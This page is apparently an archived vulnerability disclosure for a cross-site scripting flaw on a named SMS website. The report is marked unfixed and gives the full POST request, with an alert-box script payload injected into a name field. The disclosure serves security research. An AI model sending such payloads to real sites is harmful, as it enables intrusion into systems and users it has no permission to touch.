Advertisements:
Security researcher Uber0n, has submitted on 10/08/2008 a cross-site-scripting (XSS) vulnerability affecting www.freebiesms.co.uk, which at the time of submission ranked 145968 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 10/08/2008 Date published: 17/06/2009 Fixed? Mail us!Status:  UNFIXED
Author: Uber0n Domain: www.freebiesms.co.uk Category: XSS Pagerank: 145968
URL: http://www.freebiesms.co.uk/addToAddressBook.aspx
POST: __VIEWSTATE=%2FwEPDwUKLTE3NDA5Nzg2Nw9kFgICAg9kFgJmDxYCHgRUZXh0BbIQPGEgaHJlZj1odHRwOi8vd3d3LmZyZWViaW VzbXMuY28udWsgdGl0bGU9IlNlbmQgRnJlZSBTTVMgVUsiICBjbGFzcz1sZWdhbD5VSzwvYT4gfCA8YSBocmVmPWh0dHA6Ly9pcm VsYW5kLmZyZWViaWVzbXMuY29tIHJlbD1ub2ZvbGxvdyAgdGl0bGU9IlNlbmQgRnJlZSBTTVMgSXJlbGFuZCIgIGNsYXNzPWxlZ2 FsPklyZWxhbmQ8L2E%2BIHwgPGEgaHJlZj1odHRwOi8vYXVzdHJhbGlhLmZyZWViaWVzbXMuY29tIHJlbD1ub2ZvbGxvdyAgdGl0 bGU9IlNlbmQgRnJlZSBTTVMgQXVzdHJhbGlhIiAgY2xhc3M9bGVnYWw%2BQXVzdHJhbGlhPC9hPiB8IDxhIGhyZWY9aHR0cDovL3 d3dy5oYW5keXNwcnVjaGUuY29tIHRpdGxlPSJTZW5kIEZyZWUgU01TIEdlcm1hbnkiICBjbGFzcz1sZWdhbD5HZXJtYW55PC9hPi B8IDxhIGhyZWY9aHR0cDovL3d3dy5oYW5keXNwcnVjaGUuYXQgcmVsPW5vZm9sbG93ICB0aXRsZT0iU2VuZCBGcmVlIFNNUyBBdX N0cmlhIiAgY2xhc3M9bGVnYWw%2BQXVzdHJpYTwvYT4gfCA8YSBocmVmPWh0dHA6Ly93d3cuaGFuZHlzcHJ1Y2hlLmNoIHRpdGxl PSJTZW5kIEZyZWUgU01TIFN3aXR6ZXJsYW5kIiAgY2xhc3M9bGVnYWw%2BU3dpdHplcmxhbmQ8L2E%2BIHwgPGEgaHJlZj1odHRw Oi8vd3d3LmVudm95ZXpzbXMuY29tIHRpdGxlPSJTZW5kIEZyZWUgU01TIEZyYW5jZSIgIGNsYXNzPWxlZ2FsPkZyYW5jZTwvYT4g fCA8YSBocmVmPWh0dHA6Ly93d3cuZW52b3llenNtcy5iZSB0aXRsZT0iU2VuZCBGcmVlIFNNUyBCZWxnaXVtIiAgY2xhc3M9bGVn YWw%2BQmVsZ2l1bTwvYT4gfCA8YSBocmVmPWh0dHA6Ly93d3cubWVuc2FqZXRleHRvLmNvbSB0aXRsZT0iU2VuZCBGcmVlIFNNUy BTcGFpbiIgIGNsYXNzPWxlZ2FsPlNwYWluPC9hPiB8IDxhIGhyZWY9aHR0cDovL3d3dy5zbXNncmF0aXMuY28ucHQgcmVsPW5vZm 9sbG93ICB0aXRsZT0iU2VuZCBGcmVlIFNNUyBQb3J0dWdhbCIgIGNsYXNzPWxlZ2FsPlBvcnR1Z2FsPC9hPiB8IDxhIGhyZWY9aH R0cDovL3d3dy5zbXN6cHJhdnkuY29tIHJlbD1ub2ZvbGxvdyAgdGl0bGU9IlNlbmQgRnJlZSBTTVMgQ3plY2ggUmVwdWJsaWMiIC BjbGFzcz1sZWdhbD5DemVjaCBSZXB1YmxpYzwvYT4gfCA8YSBocmVmPWh0dHA6Ly93d3cuc21zZ3JhdGlzdmVyc3R1cmVuLm5sIH RpdGxlPSJTZW5kIEZyZWUgU01TIE5ldGhlcmxhbmRzIiAgY2xhc3M9bGVnYWw%2BTmV0aGVybGFuZHM8L2E%2BIHwgPGEgaHJlZj 1odHRwOi8vd3d3LnNtc21lZGRlbGFuZGUuc2UgdGl0bGU9IlNlbmQgRnJlZSBTTVMgU3dlZGVuIiAgY2xhc3M9bGVnYWw%2BU3dl ZGVuPC9hPiB8IDxhIGhyZWY9aHR0cDovL3d3dy5mcmVlYmllc21zLmNvLnphIHJlbD1ub2ZvbGxvdyAgdGl0bGU9IlNlbmQgRnJl ZSBTTVMgU291dGggQWZyaWNhIiAgY2xhc3M9bGVnYWw%2BU291dGggQWZyaWNhPC9hPiB8IDxhIGhyZWY9aHR0cDovL3d3dy5zZW 5kZ3JhdGlzc21zLmNvbSB0aXRsZT0iU2VuZCBGcmVlIFNNUyBOb3J3YXkiICBjbGFzcz1sZWdhbD5Ob3J3YXk8L2E%2BIHwgPGEg aHJlZj1odHRwOi8vd3d3LnNtcy5vcmcubXkgcmVsPW5vZm9sbG93ICB0aXRsZT0iU2VuZCBGcmVlIFNNUyBNYWxheXNpYSIgIGNs YXNzPWxlZ2FsPk1hbGF5c2lhPC9hPiB8IDxhIGhyZWY9aHR0cDovL3d3dy5zZW5kZWdyYXRpc3Ntcy5kayByZWw9bm9mb2xsb3cg IHRpdGxlPSJTZW5kIEZyZWUgU01TIERlbm1hcmsiICBjbGFzcz1sZWdhbD5EZW5tYXJrPC9hPiB8IDxhIGhyZWY9aHR0cDovL3d3 dy50YXN1dGFzbXMuY28uZWUgdGl0bGU9IlNlbmQgRnJlZSBTTVMgRXN0b25pYSIgIGNsYXNzPWxlZ2FsPkVzdG9uaWE8L2E%2BIH wgPGEgaHJlZj1odHRwOi8vd3d3LmdyYXRpc293ZXNtc3kucGwgdGl0bGU9IlNlbmQgRnJlZSBTTVMgUG9sYW5kIiAgY2xhc3M9bG VnYWw%2BUG9sYW5kPC9hPiB8IDxhIGhyZWY9aHR0cDovL3d3dy5mcmVlYmllc21zLnVzIHJlbD1ub2ZvbGxvdyAgdGl0bGU9IlNl bmQgRnJlZSBTTVMgVVNBIiAgY2xhc3M9bGVnYWw%2BVVNBPC9hPiB8IDxhIGhyZWY9aHR0cDovL3d3dy5zbXMuZXUuc2sgcmVsPW 5vZm9sbG93ICB0aXRsZT0iU2VuZCBGcmVlIFNNUyBTbG92YWtpYSIgIGNsYXNzPWxlZ2FsPlNsb3Zha2lhPC9hPiB8IGRkeGCJlL dD7tG6TDejwgXxwJSBOpk%3D&Name1=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&No1=&Email1=&Name2=&N o2=&Email2=&Name3=&No3=&Email3=
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense 		Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.